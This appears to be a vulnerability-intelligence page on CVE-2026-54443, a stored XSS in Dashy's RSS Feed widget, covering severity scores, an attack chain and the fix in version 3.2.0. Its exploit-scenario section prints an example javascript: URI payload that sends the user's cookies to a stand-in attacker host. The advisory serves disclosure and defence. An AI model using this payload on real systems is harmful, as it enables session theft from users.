Skip to main content

Dashy CVE-2026-54443

| EUVDEUVD-2026-44760 MEDIUM
Basic XSS (CWE-80)
2026-07-15 GitHub_M
5.9
CVSS 4.0 · Vendor: GitHub_M
Share

Severity by source

Vendor (GitHub_M) PRIMARY
5.9 MEDIUM
CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vuln.today AI
6.9 MEDIUM

Feed-control prerequisite justifies AC:H; no Dashy privileges needed (PR:N); user click required (UI:R); javascript: executes in Dashy origin causing scope change (S:C) with session-level confidentiality impact (C:H).

3.1 AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:N
4.0 AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N

Primary rating from Vendor (GitHub_M).

CVSS VectorVendor: GitHub_M

CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
High
Privileges Required
None
User Interaction
A
Scope
X

Lifecycle Timeline

3
Patch available
Jul 15, 2026 - 21:18 EUVD
Source Code Evidence Fetched
Jul 15, 2026 - 19:01 vuln.today
Analysis Generated
Jul 15, 2026 - 19:01 vuln.today

DescriptionCVE.org

Dashy is a self-hostable personal dashboard. From 1.9.4 until 3.2.0, the Dashy RSS Widget in src/components/Widgets/RssFeed.vue does not sanitize RSS item link values before rendering feed item titles and Read More links as anchor href attributes, allowing an attacker-controlled feed to provide a javascript: URI that executes when clicked in the Dashy origin. This issue is fixed in version 3.2.0.

AnalysisAI

Stored XSS via unsanitized javascript: URI injection in the Dashy RSS Feed widget (src/components/Widgets/RssFeed.vue) affects all releases from 1.9.4 through 3.1.x, allowing an attacker who controls an RSS feed source configured in the dashboard to deliver a malicious anchor href that executes arbitrary JavaScript in the Dashy origin when a user clicks it. The attack requires both feed-source control and user interaction, and is confined to the Dashy application origin - meaning session tokens, cookies, or dashboard credentials are the primary targets. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon
Attacker controls or compromises an RSS feed source
Delivery
Injects feed item with javascript: URI as link value
Exploit
Dashy admin configures or retains feed in RSS widget
Install
Dashy fetches feed and renders unsanitized href in anchor element
C2
User clicks 'Read More' link in widget
Execute
JavaScript executes in Dashy browser origin
Impact
Session tokens or cookies exfiltrated to attacker

Vulnerability AssessmentAI

Exploitation Two concrete prerequisites must both be satisfied: (1) the attacker must control or successfully compromise the content of an RSS feed URL that has been added to the Dashy RSS Feed widget configuration - this is the AT:P prerequisite in the CVSS 4.0 vector; and (2) a Dashy user must actively click the 'Read More' or title link rendered from the malicious feed item - the UI:A requirement. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 4.0 vector (AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N) accurately captures the key risk dimensions: the attack is network-delivered but requires high complexity and a specific prerequisite (AT:P) - the attacker must control or compromise the RSS feed URL configured in the widget. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker hosts or compromises an RSS feed and injects an item whose link element contains a `javascript:` URI payload (e.g., `javascript:fetch('https://attacker.example/exfil?d='+btoa(document.cookie))`). When a Dashy user with that feed configured views the RSS widget and clicks the rendered 'Read More' link, the payload executes in the Dashy browser origin, exfiltrating session cookies or tokens to the attacker's server. …
Remediation Vendor-released patch: version 3.2.0. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-54443 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy